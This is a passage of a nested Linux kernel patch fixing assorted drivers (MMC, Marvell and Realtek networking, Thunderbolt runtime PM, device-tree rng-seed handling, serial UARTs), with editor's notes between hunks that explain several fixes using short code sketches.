+@@ -1416,17 +1417,24 @@ static void sdhci_esdhc_imx_hwinit(struct sdhci_host *host)
+ 
+ 		if (imx_data->socdata->flags & ESDHC_FLAG_STD_TUNING) {
+ 			tmp = readl(host->ioaddr + ESDHC_TUNING_CTRL);
+-			tmp |= ESDHC_STD_TUNING_EN |
+-				ESDHC_TUNING_START_TAP_DEFAULT;
+-			if (imx_data->boarddata.tuning_start_tap) {
+-				tmp &= ~ESDHC_TUNING_START_TAP_MASK;
++			tmp |= ESDHC_STD_TUNING_EN;
++
++			/*
++			 * ROM code or bootloader may config the start tap
++			 * and step, unmask them first.
++			 */
++			tmp &= ~(ESDHC_TUNING_START_TAP_MASK | ESDHC_TUNING_STEP_MASK);
++			if (imx_data->boarddata.tuning_start_tap)
+ 				tmp |= imx_data->boarddata.tuning_start_tap;
+-			}
++			else
++				tmp |= ESDHC_TUNING_START_TAP_DEFAULT;
+ 
+ 			if (imx_data->boarddata.tuning_step) {
+-				tmp &= ~ESDHC_TUNING_STEP_MASK;
+ 				tmp |= imx_data->boarddata.tuning_step
+ 					<< ESDHC_TUNING_STEP_SHIFT;
++			} else {
++				tmp |= ESDHC_TUNING_STEP_DEFAULT
++					<< ESDHC_TUNING_STEP_SHIFT;
+ 			}
+ 
+ 			/* Disable the CMD CRC check for tuning, if not, need to
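
[Editor's note] The tuning hunk's point is that ROM code or a bootloader may leave stale values in both the start-tap and step fields, so the fix masks both fields off before OR-ing in either the DT-provided or the default value (it also switches tmp to u32, avoiding sign surprises in a register read-modify-write). A generic sketch of that clear-then-set pattern follows, with illustrative field definitions mirroring the ones above.

#include <linux/io.h>

#define TUNING_START_TAP_MASK	0x7f
#define TUNING_STEP_MASK	0x00070000
#define TUNING_STEP_SHIFT	16

static void set_tuning_fields(void __iomem *reg, u32 start_tap, u32 step)
{
	u32 tmp = readl(reg);

	/* Clear both fields so firmware-set values cannot leak through. */
	tmp &= ~(TUNING_START_TAP_MASK | TUNING_STEP_MASK);
	tmp |= start_tap & TUNING_START_TAP_MASK;
	tmp |= (step << TUNING_STEP_SHIFT) & TUNING_STEP_MASK;

	writel(tmp, reg);
}
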
+diff --git a/drivers/mmc/host/sunxi-mmc.c b/drivers/mmc/host/sunxi-mmc.c
+index b16e12e62e722..3db9f32d6a7b9 100644
+--- a/drivers/mmc/host/sunxi-mmc.c
++++ b/drivers/mmc/host/sunxi-mmc.c
+@@ -1492,9 +1492,11 @@ static int sunxi_mmc_remove(struct platform_device *pdev)
+ 	struct sunxi_mmc_host *host = mmc_priv(mmc);
+ 
+ 	mmc_remove_host(mmc);
+-	pm_runtime_force_suspend(&pdev->dev);
+-	disable_irq(host->irq);
+-	sunxi_mmc_disable(host);
++	pm_runtime_disable(&pdev->dev);
++	if (!pm_runtime_status_suspended(&pdev->dev)) {
++		disable_irq(host->irq);
++		sunxi_mmc_disable(host);
++	}
+ 	dma_free_coherent(&pdev->dev, PAGE_SIZE, host->sg_cpu, host->sg_dma);
+ 	mmc_free_host(mmc);
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+index fa8029a940689..eb25e458266ca 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+@@ -589,7 +589,7 @@ int rvu_mbox_handler_mcs_free_resources(struct rvu *rvu,
+ 	u16 pcifunc = req->hdr.pcifunc;
+ 	struct mcs_rsrc_map *map;
+ 	struct mcs *mcs;
+-	int rc;
++	int rc = 0;
+ 
+ 	if (req->mcs_id >= rvu->mcs_blk_cnt)
+ 		return MCS_AF_ERR_INVALID_MCSID;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+index 88f8772a61cd5..8a41ad8ca04f1 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+@@ -1012,7 +1012,6 @@ static void otx2_pool_refill_task(struct work_struct *work)
+ 	rbpool = cq->rbpool;
+ 	free_ptrs = cq->pool_ptrs;
+ 
+-	get_cpu();
+ 	while (cq->pool_ptrs) {
+ 		if (otx2_alloc_rbuf(pfvf, rbpool, &bufptr)) {
+ 			/* Schedule a WQ if we fails to free atleast half of the
+@@ -1032,7 +1031,6 @@ static void otx2_pool_refill_task(struct work_struct *work)
+ 		pfvf->hw_ops->aura_freeptr(pfvf, qidx, bufptr + OTX2_HEAD_ROOM);
+ 		cq->pool_ptrs--;
+ 	}
+-	put_cpu();
+ 	cq->refill_task_sched = false;
+ }
+ 
+@@ -1370,7 +1368,6 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 	if (err)
+ 		goto fail;
+ 
+-	get_cpu();
+ 	/* Allocate pointers and free them to aura/pool */
+ 	for (qidx = 0; qidx < hw->tot_tx_queues; qidx++) {
+ 		pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
+@@ -1394,7 +1391,6 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 	}
+ 
+ err_mem:
+-	put_cpu();
+ 	return err ? -ENOMEM : 0;
+ 
+ fail:
+@@ -1435,21 +1431,18 @@ int otx2_rq_aura_pool_init(struct otx2_nic *pfvf)
+ 	if (err)
+ 		goto fail;
+ 
+-	get_cpu();
+ 	/* Allocate pointers and free them to aura/pool */
+ 	for (pool_id = 0; pool_id < hw->rqpool_cnt; pool_id++) {
+ 		pool = &pfvf->qset.pool[pool_id];
+ 		for (ptr = 0; ptr < num_ptrs; ptr++) {
+ 			err = otx2_alloc_rbuf(pfvf, pool, &bufptr);
+ 			if (err)
+-				goto err_mem;
++				return -ENOMEM;
+ 			pfvf->hw_ops->aura_freeptr(pfvf, pool_id,
+ 						   bufptr + OTX2_HEAD_ROOM);
+ 		}
+ 	}
+-err_mem:
+-	put_cpu();
+-	return err ? -ENOMEM : 0;
++	return 0;
+ fail:
+ 	otx2_mbox_reset(&pfvf->mbox.mbox, 0);
+ 	otx2_aura_pool_free(pfvf);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 67aa02bb2b85c..712715a49d201 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -733,8 +733,10 @@ static inline void cn10k_aura_freeptr(void *dev, int aura, u64 buf)
+ 	u64 ptrs[2];
+ 
+ 	ptrs[1] = buf;
++	get_cpu();
+ 	/* Free only one buffer at time during init and teardown */
+ 	__cn10k_aura_freeptr(pfvf, aura, ptrs, 2);
++	put_cpu();
+ }
+ 
+ /* Alloc pointer from pool/aura */
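
[Editor's note] The otx2 hunks move preemption control out of the long-running allocation loops and into the one helper that actually needs a stable CPU: cn10k_aura_freeptr() now brackets the per-CPU LMTST store with get_cpu()/put_cpu(). A minimal sketch of the pattern, assuming kernel context; do_aura_free() is a stand-in for __cn10k_aura_freeptr().

#include <linux/smp.h>
#include <linux/types.h>

static void do_aura_free(void *dev, int aura, u64 *ptrs, int num)
{
	/* stand-in: issues the per-CPU LMTST store */
}

static void freeptr_on_stable_cpu(void *dev, int aura, u64 buf)
{
	u64 ptrs[2] = { 0, buf };

	/*
	 * get_cpu() disables preemption, so the per-CPU LMTST region
	 * cannot change under the store; put_cpu() re-enables it. The
	 * preempt-off window is now a handful of instructions instead
	 * of a whole allocation loop.
	 */
	get_cpu();
	do_aura_free(dev, aura, ptrs, 2);
	put_cpu();
}
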
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/health.c b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+index 96417c5feed76..879555ba847dd 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/health.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+@@ -677,6 +677,7 @@ static void mlx5_fw_fatal_reporter_err_work(struct work_struct *work)
+ 	mutex_lock(&dev->intf_state_mutex);
+ 	if (test_bit(MLX5_DROP_NEW_HEALTH_WORK, &health->flags)) {
+ 		mlx5_core_err(dev, "health works are not permitted at this stage\n");
++		mutex_unlock(&dev->intf_state_mutex);
+ 		return;
+ 	}
+ 	mutex_unlock(&dev->intf_state_mutex);
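
[Editor's note] The mlx5 fix is a classic lock leak: the early-return branch kept intf_state_mutex held. A reduced sketch of the rule that every exit path under a lock must release it, assuming kernel context; the names are illustrative.

#include <linux/bitops.h>
#include <linux/errno.h>
#include <linux/mutex.h>

static DEFINE_MUTEX(state_mutex);
static unsigned long state_flags;

static int run_health_work(void)
{
	mutex_lock(&state_mutex);
	if (test_bit(0, &state_flags)) {
		mutex_unlock(&state_mutex);	/* the line the patch adds */
		return -EBUSY;
	}
	mutex_unlock(&state_mutex);

	/* ... heavy recovery work runs outside the lock ... */
	return 0;
}
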
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index fe8dc8e0522b0..cabed1b7b45ed 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -2207,28 +2207,6 @@ static int rtl_set_mac_address(struct net_device *dev, void *p)
+ 	return 0;
+ }
+ 
+-static void rtl_wol_enable_rx(struct rtl8169_private *tp)
+-{
+-	if (tp->mac_version >= RTL_GIGA_MAC_VER_25)
+-		RTL_W32(tp, RxConfig, RTL_R32(tp, RxConfig) |
+-			AcceptBroadcast | AcceptMulticast | AcceptMyPhys);
+-}
+-
+-static void rtl_prepare_power_down(struct rtl8169_private *tp)
+-{
+-	if (tp->dash_type != RTL_DASH_NONE)
+-		return;
+-
+-	if (tp->mac_version == RTL_GIGA_MAC_VER_32 ||
+-	    tp->mac_version == RTL_GIGA_MAC_VER_33)
+-		rtl_ephy_write(tp, 0x19, 0xff64);
+-
+-	if (device_may_wakeup(tp_to_dev(tp))) {
+-		phy_speed_down(tp->phydev, false);
+-		rtl_wol_enable_rx(tp);
+-	}
+-}
+-
+ static void rtl_init_rxcfg(struct rtl8169_private *tp)
+ {
+ 	switch (tp->mac_version) {
+@@ -2452,6 +2430,31 @@ static void rtl_enable_rxdvgate(struct rtl8169_private *tp)
+ 	rtl_wait_txrx_fifo_empty(tp);
+ }
+ 
++static void rtl_wol_enable_rx(struct rtl8169_private *tp)
++{
++	if (tp->mac_version >= RTL_GIGA_MAC_VER_25)
++		RTL_W32(tp, RxConfig, RTL_R32(tp, RxConfig) |
++			AcceptBroadcast | AcceptMulticast | AcceptMyPhys);
++
++	if (tp->mac_version >= RTL_GIGA_MAC_VER_40)
++		rtl_disable_rxdvgate(tp);
++}
++
++static void rtl_prepare_power_down(struct rtl8169_private *tp)
++{
++	if (tp->dash_type != RTL_DASH_NONE)
++		return;
++
++	if (tp->mac_version == RTL_GIGA_MAC_VER_32 ||
++	    tp->mac_version == RTL_GIGA_MAC_VER_33)
++		rtl_ephy_write(tp, 0x19, 0xff64);
++
++	if (device_may_wakeup(tp_to_dev(tp))) {
++		phy_speed_down(tp->phydev, false);
++		rtl_wol_enable_rx(tp);
++	}
++}
++
+ static void rtl_set_tx_config_registers(struct rtl8169_private *tp)
+ {
+ 	u32 val = TX_DMA_BURST << TxDMAShift |
+@@ -3869,7 +3872,7 @@ static void rtl8169_tx_clear(struct rtl8169_private *tp)
+ 	netdev_reset_queue(tp->dev);
+ }
+ 
+-static void rtl8169_cleanup(struct rtl8169_private *tp, bool going_down)
++static void rtl8169_cleanup(struct rtl8169_private *tp)
+ {
+ 	napi_disable(&tp->napi);
+ 
+@@ -3881,9 +3884,6 @@ static void rtl8169_cleanup(struct rtl8169_private *tp, bool going_down)
+ 
+ 	rtl_rx_close(tp);
+ 
+-	if (going_down && tp->dev->wol_enabled)
+-		goto no_reset;
+-
+ 	switch (tp->mac_version) {
+ 	case RTL_GIGA_MAC_VER_28:
+ 	case RTL_GIGA_MAC_VER_31:
+@@ -3904,7 +3904,7 @@ static void rtl8169_cleanup(struct rtl8169_private *tp, bool going_down)
+ 	}
+ 
+ 	rtl_hw_reset(tp);
+-no_reset:
++
+ 	rtl8169_tx_clear(tp);
+ 	rtl8169_init_ring_indexes(tp);
+ }
+@@ -3915,7 +3915,7 @@ static void rtl_reset_work(struct rtl8169_private *tp)
+ 
+ 	netif_stop_queue(tp->dev);
+ 
+-	rtl8169_cleanup(tp, false);
++	rtl8169_cleanup(tp);
+ 
+ 	for (i = 0; i < NUM_RX_DESC; i++)
+ 		rtl8169_mark_to_asic(tp->RxDescArray + i);
+@@ -4601,7 +4601,7 @@ static void rtl8169_down(struct rtl8169_private *tp)
+ 	pci_clear_master(tp->pci_dev);
+ 	rtl_pci_commit(tp);
+ 
+-	rtl8169_cleanup(tp, true);
++	rtl8169_cleanup(tp);
+ 	rtl_disable_exit_l1(tp);
+ 	rtl_prepare_power_down(tp);
+ }
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+index 5630f6e718e12..067ea019b110a 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+@@ -1218,7 +1218,7 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo)
+ 				BRCMF_NROF_H2D_COMMON_MSGRINGS;
+ 		max_completionrings = BRCMF_NROF_D2H_COMMON_MSGRINGS;
+ 	}
+-	if (max_flowrings > 256) {
++	if (max_flowrings > 512) {
+ 		brcmf_err(bus, "invalid max_flowrings(%d)\n", max_flowrings);
+ 		return -EIO;
+ 	}
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+index e6d64152c81a7..a02e5a67b7066 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+@@ -1106,6 +1106,11 @@ int iwl_read_ppag_table(struct iwl_fw_runtime *fwrt, union iwl_ppag_table_cmd *c
+         int i, j, num_sub_bands;
+         s8 *gain;
+ 
++	/* many firmware images for JF lie about this */
++	if (CSR_HW_RFID_TYPE(fwrt->trans->hw_rf_id) ==
++	    CSR_HW_RFID_TYPE(CSR_HW_RF_ID_TYPE_JF))
++		return -EOPNOTSUPP;
++
+         if (!fw_has_capa(&fwrt->fw->ucode_capa, IWL_UCODE_TLV_CAPA_SET_PPAG)) {
+                 IWL_DEBUG_RADIO(fwrt,
+                                 "PPAG capability not supported by FW, command not sent.\n");
+diff --git a/drivers/of/fdt.c b/drivers/of/fdt.c
+index 4f88e8bbdd279..f08b25195ae79 100644
+--- a/drivers/of/fdt.c
++++ b/drivers/of/fdt.c
+@@ -1163,18 +1163,32 @@ int __init early_init_dt_scan_chosen(char *cmdline)
+ 	if (node < 0)
+ 		node = fdt_path_offset(fdt, "/chosen@0");
+ 	if (node < 0)
+-		return -ENOENT;
++		/* Handle the cmdline config options even if no /chosen node */
++		goto handle_cmdline;
+ 
+ 	chosen_node_offset = node;
+ 
+ 	early_init_dt_check_for_initrd(node);
+ 	early_init_dt_check_for_elfcorehdr(node);
+ 
++	rng_seed = of_get_flat_dt_prop(node, "rng-seed", &l);
++	if (rng_seed && l > 0) {
++		add_bootloader_randomness(rng_seed, l);
++
++		/* try to clear seed so it won't be found. */
++		fdt_nop_property(initial_boot_params, node, "rng-seed");
++
++		/* update CRC check value */
++		of_fdt_crc32 = crc32_be(~0, initial_boot_params,
++				fdt_totalsize(initial_boot_params));
++	}
++
+ 	/* Retrieve command line */
+ 	p = of_get_flat_dt_prop(node, "bootargs", &l);
+ 	if (p != NULL && l > 0)
+ 		strscpy(cmdline, p, min(l, COMMAND_LINE_SIZE));
+ 
++handle_cmdline:
+ 	/*
+ 	 * CONFIG_CMDLINE is meant to be a default in case nothing else
+ 	 * managed to set the command line, unless CONFIG_CMDLINE_FORCE
+@@ -1195,18 +1209,6 @@ int __init early_init_dt_scan_chosen(char *cmdline)
+ 
+ 	pr_debug("Command line is: %s\n", (char *)cmdline);
+ 
+-	rng_seed = of_get_flat_dt_prop(node, "rng-seed", &l);
+-	if (rng_seed && l > 0) {
+-		add_bootloader_randomness(rng_seed, l);
+-
+-		/* try to clear seed so it won't be found. */
+-		fdt_nop_property(initial_boot_params, node, "rng-seed");
+-
+-		/* update CRC check value */
+-		of_fdt_crc32 = crc32_be(~0, initial_boot_params,
+-				fdt_totalsize(initial_boot_params));
+-	}
+-
+ 	return 0;
+ }
+ 
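
[Editor's note] The of/fdt reorder matters for two reasons: the rng-seed must be consumed (and nop'ed out of the FDT, with the CRC recomputed) before any return path, and the CONFIG_CMDLINE fallback must run even when there is no /chosen node at all, hence the new handle_cmdline label. A control-flow sketch follows; all helpers are hypothetical stand-ins, not kernel APIs.

static int find_chosen_node(void);
static void consume_rng_seed(int node);	/* seed + fdt_nop + CRC update */
static void copy_bootargs(int node, char *cmdline);
static void apply_config_cmdline(char *cmdline);

static int scan_chosen(char *cmdline)
{
	int node = find_chosen_node();

	if (node < 0)
		goto handle_cmdline;	/* no /chosen: defaults still apply */

	consume_rng_seed(node);		/* before any later return */
	copy_bootargs(node, cmdline);

handle_cmdline:
	apply_config_cmdline(cmdline);
	return 0;
}
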
+diff --git a/drivers/soc/qcom/apr.c b/drivers/soc/qcom/apr.c
+index cd44f17dad3d0..d51abb462ae5d 100644
+--- a/drivers/soc/qcom/apr.c
++++ b/drivers/soc/qcom/apr.c
+@@ -461,9 +461,10 @@ static int apr_add_device(struct device *dev, struct device_node *np,
+ 		goto out;
+ 	}
+ 
++	/* Protection domain is optional, it does not exist on older platforms */
+ 	ret = of_property_read_string_index(np, "qcom,protection-domain",
+ 					    1, &adev->service_path);
+-	if (ret < 0) {
++	if (ret < 0 && ret != -EINVAL) {
+ 		dev_err(dev, "Failed to read second value of qcom,protection-domain\n");
+ 		goto out;
+ 	}
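
[Editor's note] of_property_read_string_index() returns -EINVAL when the property is missing entirely, which for an optional binding like qcom,protection-domain is not an error. A small sketch of that distinction, assuming kernel context:

#include <linux/of.h>

static int read_service_path(struct device_node *np, const char **path)
{
	int ret;

	ret = of_property_read_string_index(np, "qcom,protection-domain",
					    1, path);
	if (ret == -EINVAL) {
		/* Property absent: fine on older platforms. */
		*path = NULL;
		return 0;
	}

	return ret;	/* 0 on success; anything else is a real failure */
}
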
+diff --git a/drivers/staging/vc04_services/include/linux/raspberrypi/vchiq.h b/drivers/staging/vc04_services/include/linux/raspberrypi/vchiq.h
+index db1441c0cc662..690ab7165b2c1 100644
+--- a/drivers/staging/vc04_services/include/linux/raspberrypi/vchiq.h
++++ b/drivers/staging/vc04_services/include/linux/raspberrypi/vchiq.h
+@@ -86,7 +86,7 @@ struct vchiq_service_params_kernel {
+ 
+ struct vchiq_instance;
+ 
+-extern enum vchiq_status vchiq_initialise(struct vchiq_instance **pinstance);
++extern int vchiq_initialise(struct vchiq_instance **pinstance);
+ extern enum vchiq_status vchiq_shutdown(struct vchiq_instance *instance);
+ extern enum vchiq_status vchiq_connect(struct vchiq_instance *instance);
+ extern enum vchiq_status vchiq_open_service(struct vchiq_instance *instance,
+diff --git a/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.h b/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.h
+index 2851ef6b9cd0f..cd20eb18f2751 100644
+--- a/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.h
++++ b/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.h
+@@ -100,10 +100,10 @@ vchiq_dump_platform_use_state(struct vchiq_state *state);
+ extern void
+ vchiq_dump_service_use_state(struct vchiq_state *state);
+ 
+-extern enum vchiq_status
++extern int
+ vchiq_use_internal(struct vchiq_state *state, struct vchiq_service *service,
+ 		   enum USE_TYPE_E use_type);
+-extern enum vchiq_status
++extern int
+ vchiq_release_internal(struct vchiq_state *state,
+ 		       struct vchiq_service *service);
+ 
+diff --git a/drivers/thunderbolt/retimer.c b/drivers/thunderbolt/retimer.c
+index 81252e31014a1..56008eb91e2e4 100644
+--- a/drivers/thunderbolt/retimer.c
++++ b/drivers/thunderbolt/retimer.c
+@@ -427,13 +427,6 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ {
+ 	u32 status[TB_MAX_RETIMER_INDEX + 1] = {};
+ 	int ret, i, last_idx = 0;
+-	struct usb4_port *usb4;
+-
+-	usb4 = port->usb4;
+-	if (!usb4)
+-		return 0;
+-
+-	pm_runtime_get_sync(&usb4->dev);
+ 
+ 	/*
+ 	 * Send broadcast RT to make sure retimer indices facing this
+@@ -441,7 +434,7 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 	 */
+ 	ret = usb4_port_enumerate_retimers(port);
+ 	if (ret)
+-		goto out;
++		return ret;
+ 
+ 	/*
+ 	 * Enable sideband channel for each retimer. We can do this
+@@ -471,12 +464,11 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 			break;
+ 	}
+ 
+-	if (!last_idx) {
+-		ret = 0;
+-		goto out;
+-	}
++	if (!last_idx)
++		return 0;
+ 
+ 	/* Add on-board retimers if they do not exist already */
++	ret = 0;
+ 	for (i = 1; i <= last_idx; i++) {
+ 		struct tb_retimer *rt;
+ 
+@@ -490,10 +482,6 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 		}
+ 	}
+ 
+-out:
+-	pm_runtime_mark_last_busy(&usb4->dev);
+-	pm_runtime_put_autosuspend(&usb4->dev);
+-
+ 	return ret;
+ }
+ 
+diff --git a/drivers/thunderbolt/tb.c b/drivers/thunderbolt/tb.c
+index 4628458044270..3f1ab30c4fb15 100644
+--- a/drivers/thunderbolt/tb.c
++++ b/drivers/thunderbolt/tb.c
+@@ -628,11 +628,15 @@ static void tb_scan_port(struct tb_port *port)
+ 			 * Downstream switch is reachable through two ports.
+ 			 * Only scan on the primary port (link_nr == 0).
+ 			 */
++
++	if (port->usb4)
++		pm_runtime_get_sync(&port->usb4->dev);
++
+ 	if (tb_wait_for_port(port, false) <= 0)
+-		return;
++		goto out_rpm_put;
+ 	if (port->remote) {
+ 		tb_port_dbg(port, "port already has a remote\n");
+-		return;
++		goto out_rpm_put;
+ 	}
+ 
+ 	tb_retimer_scan(port, true);
+@@ -647,12 +651,12 @@ static void tb_scan_port(struct tb_port *port)
+ 		 */
+ 		if (PTR_ERR(sw) == -EIO || PTR_ERR(sw) == -EADDRNOTAVAIL)
+ 			tb_scan_xdomain(port);
+-		return;
++		goto out_rpm_put;
+ 	}
+ 
+ 	if (tb_switch_configure(sw)) {
+ 		tb_switch_put(sw);
+-		return;
++		goto out_rpm_put;
+ 	}
+ 
+ 	/*
+@@ -681,7 +685,7 @@ static void tb_scan_port(struct tb_port *port)
+ 
+ 	if (tb_switch_add(sw)) {
+ 		tb_switch_put(sw);
+-		return;
++		goto out_rpm_put;
+ 	}
+ 
+ 	/* Link the switches using both links if available */
+@@ -733,6 +737,12 @@ static void tb_scan_port(struct tb_port *port)
+ 
+ 	tb_add_dp_resources(sw);
+ 	tb_scan_switch(sw);
++
++out_rpm_put:
++	if (port->usb4) {
++		pm_runtime_mark_last_busy(&port->usb4->dev);
++		pm_runtime_put_autosuspend(&port->usb4->dev);
++	}
+ }
+ 
+ static void tb_deactivate_and_free_tunnel(struct tb_tunnel *tunnel)
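
[Editor's note] tb_scan_port() now pins the USB4 port for the whole scan and releases it with autosuspend on every exit path, replacing the narrower get/put that used to live in tb_retimer_scan(). The bracket pattern, reduced to a sketch with do_scan() as a hypothetical body:

#include <linux/pm_runtime.h>

static int do_scan(struct device *dev);	/* hypothetical scan body */

static int scan_with_rpm(struct device *dev)
{
	int ret;

	pm_runtime_get_sync(dev);	/* resume the device and hold a ref */

	ret = do_scan(dev);

	/* Single exit: record activity, then let autosuspend take over. */
	pm_runtime_mark_last_busy(dev);
	pm_runtime_put_autosuspend(dev);

	return ret;
}
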
+diff --git a/drivers/thunderbolt/tunnel.c b/drivers/thunderbolt/tunnel.c
+index 2c3cf7fc33571..1fc3c29b24f83 100644
+--- a/drivers/thunderbolt/tunnel.c
++++ b/drivers/thunderbolt/tunnel.c
+@@ -1275,7 +1275,7 @@ static void tb_usb3_reclaim_available_bandwidth(struct tb_tunnel *tunnel,
+ 		return;
+ 	} else if (!ret) {
+ 		/* Use maximum link rate if the link valid is not set */
+-		ret = usb4_usb3_port_max_link_rate(tunnel->src_port);
++		ret = tb_usb3_max_link_rate(tunnel->dst_port, tunnel->src_port);
+ 		if (ret < 0) {
+ 			tb_tunnel_warn(tunnel, "failed to read maximum link rate\n");
+ 			return;
+diff --git a/drivers/thunderbolt/xdomain.c b/drivers/thunderbolt/xdomain.c
+index f00b2f62d8e3c..9a3c52f6b8c97 100644
+--- a/drivers/thunderbolt/xdomain.c
++++ b/drivers/thunderbolt/xdomain.c
+@@ -1419,12 +1419,19 @@ static int tb_xdomain_get_properties(struct tb_xdomain *xd)
+ 	 * registered, we notify the userspace that it has changed.
+ 	 */
+ 	if (!update) {
+-		struct tb_port *port;
++		/*
++		 * Now disable lane 1 if bonding was not enabled. Do
++		 * this only if bonding was possible at the beginning
++		 * (that is we are the connection manager and there are
++		 * two lanes).
++		 */
++		if (xd->bonding_possible) {
++			struct tb_port *port;
+ 
+-		/* Now disable lane 1 if bonding was not enabled */
+-		port = tb_port_at(xd->route, tb_xdomain_parent(xd));
+-		if (!port->bonded)
+-			tb_port_disable(port->dual_link_port);
++			port = tb_port_at(xd->route, tb_xdomain_parent(xd));
++			if (!port->bonded)
++				tb_port_disable(port->dual_link_port);
++		}
+ 
+ 		if (device_add(&xd->dev)) {
+ 			dev_err(&xd->dev, "failed to add XDomain device\n");
+diff --git a/drivers/tty/serial/8250/8250_exar.c b/drivers/tty/serial/8250/8250_exar.c
+index 314a05e009df9..64770c62bbec5 100644
+--- a/drivers/tty/serial/8250/8250_exar.c
++++ b/drivers/tty/serial/8250/8250_exar.c
+@@ -43,6 +43,12 @@
+ #define PCI_DEVICE_ID_EXAR_XR17V4358		0x4358
+ #define PCI_DEVICE_ID_EXAR_XR17V8358		0x8358
+ 
++#define PCI_DEVICE_ID_SEALEVEL_710xC		0x1001
++#define PCI_DEVICE_ID_SEALEVEL_720xC		0x1002
++#define PCI_DEVICE_ID_SEALEVEL_740xC		0x1004
++#define PCI_DEVICE_ID_SEALEVEL_780xC		0x1008
++#define PCI_DEVICE_ID_SEALEVEL_716xC		0x1010
++
+ #define UART_EXAR_INT0		0x80
+ #define UART_EXAR_8XMODE	0x88	/* 8X sampling rate select */
+ #define UART_EXAR_SLEEP		0x8b	/* Sleep mode */
+@@ -638,6 +644,8 @@ exar_pci_probe(struct pci_dev *pcidev, const struct pci_device_id *ent)
+ 		nr_ports = BIT(((pcidev->device & 0x38) >> 3) - 1);
+ 	else if (board->num_ports)
+ 		nr_ports = board->num_ports;
++	else if (pcidev->vendor == PCI_VENDOR_ID_SEALEVEL)
++		nr_ports = pcidev->device & 0xff;
+ 	else
+ 		nr_ports = pcidev->device & 0x0f;
+ 
+@@ -864,6 +872,12 @@ static const struct pci_device_id exar_pci_tbl[] = {
+ 	EXAR_DEVICE(COMMTECH, 4224PCI335, pbn_fastcom335_4),
+ 	EXAR_DEVICE(COMMTECH, 2324PCI335, pbn_fastcom335_4),
+ 	EXAR_DEVICE(COMMTECH, 2328PCI335, pbn_fastcom335_8),
++
++	EXAR_DEVICE(SEALEVEL, 710xC, pbn_exar_XR17V35x),
++	EXAR_DEVICE(SEALEVEL, 720xC, pbn_exar_XR17V35x),
++	EXAR_DEVICE(SEALEVEL, 740xC, pbn_exar_XR17V35x),
++	EXAR_DEVICE(SEALEVEL, 780xC, pbn_exar_XR17V35x),
++	EXAR_DEVICE(SEALEVEL, 716xC, pbn_exar_XR17V35x),
+ 	{ 0, }
+ };
+ MODULE_DEVICE_TABLE(pci, exar_pci_tbl);
+diff --git a/drivers/tty/serial/amba-pl011.c b/drivers/tty/serial/amba-pl011.c
+index aa0bbb7abeacf..0a1cc36f93aa7 100644
+--- a/drivers/tty/serial/amba-pl011.c
++++ b/drivers/tty/serial/amba-pl011.c
+@@ -1467,6 +1467,10 @@ static bool pl011_tx_chars(struct uart_amba_port *uap, bool from_irq)
+ 	struct circ_buf *xmit = &uap->port.state->xmit;
+ 	int count = uap->fifosize >> 1;
+ 
++	if ((uap->port.rs485.flags & SER_RS485_ENABLED) &&
++	    !uap->rs485_tx_started)
++		pl011_rs485_tx_start(uap);
++
+ 	if (uap->port.x_char) {
+ 		if (!pl011_tx_char(uap, uap->port.x_char, from_irq))
+ 			return true;
+@@ -1478,10 +1482,6 @@ static bool pl011_tx_chars(struct uart_amba_port *uap, bool from_irq)
+ 		return false;
+ 	}
+ 
+-	if ((uap->port.rs485.flags & SER_RS485_ENABLED) &&
+-	    !uap->rs485_tx_started)
+-		pl011_rs485_tx_start(uap);
+-
+ 	/* If we are using DMA mode, try to send some characters. */
+ 	if (pl011_dma_tx_irq(uap))
+ 		return true;
+diff --git a/drivers/tty/serial/atmel_serial.c b/drivers/tty/serial/atmel_serial.c
+index bd07f79a2df91..cff64e5edee26 100644
+--- a/drivers/tty/serial/atmel_serial.c
++++ b/drivers/tty/serial/atmel_serial.c
+@@ -2673,13 +2673,7 @@ static void __init atmel_console_get_options(struct uart_port *port, int *baud,
+ 	else if (mr == ATMEL_US_PAR_ODD)
+ 		*parity = 'o';
+ 
+-	/*
+-	 * The serial core only rounds down when matching this to a
